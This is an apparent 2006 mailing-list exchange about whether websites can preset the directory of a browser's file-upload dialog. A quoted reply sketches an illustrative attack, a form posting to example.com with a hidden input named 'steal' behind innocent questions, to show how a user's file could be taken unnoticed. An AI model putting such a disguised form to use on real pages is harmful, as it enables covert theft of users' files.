Posted by Jochem Maas on 01/19/06 16:02
are you sure it was not internet explorer just showing you the last
directory you had opened with a 'browse...' button with in that browsing
Jay Blanchard wrote:
>>Along these same lines, does anyone know how to make the file dialog
>>in a specific directory? I saw this the other day but forgot where. I
>>clicked browse and the dialog popped up pointed to My Pictures (which
>>least works for most Windblows users). I meant to look at the code,
> If it *DOES* work, you've probably got yet another security problem in
> Suppose, for example, that I do something like this:
> <form action="http://example.com/" method="post"
> <input style="visibility: hidden" name="steal"
> What's your name? <input name="name"><br />
> Who's your daddy? <input name="daddy"><br />
> <input type="submit">
> Now, the unsuspecting user will be HANDING me the file I shouldn't
> have without ever seeing anything about it.
> Even if it "only" lets you pick the directory, but not the file, it
> probably exposes too much information about my desktop for my tastes.
> Now I need to go back and find it. It was a site having to do with photos,
> but I was doing research and visited a lot of them. Since the upload dialog
> was looking for photos you can see where the apparent convenience could come
> in. But you're right....as a security hole it is big enough for aircrafy
> carrier usage.
[Back to original message]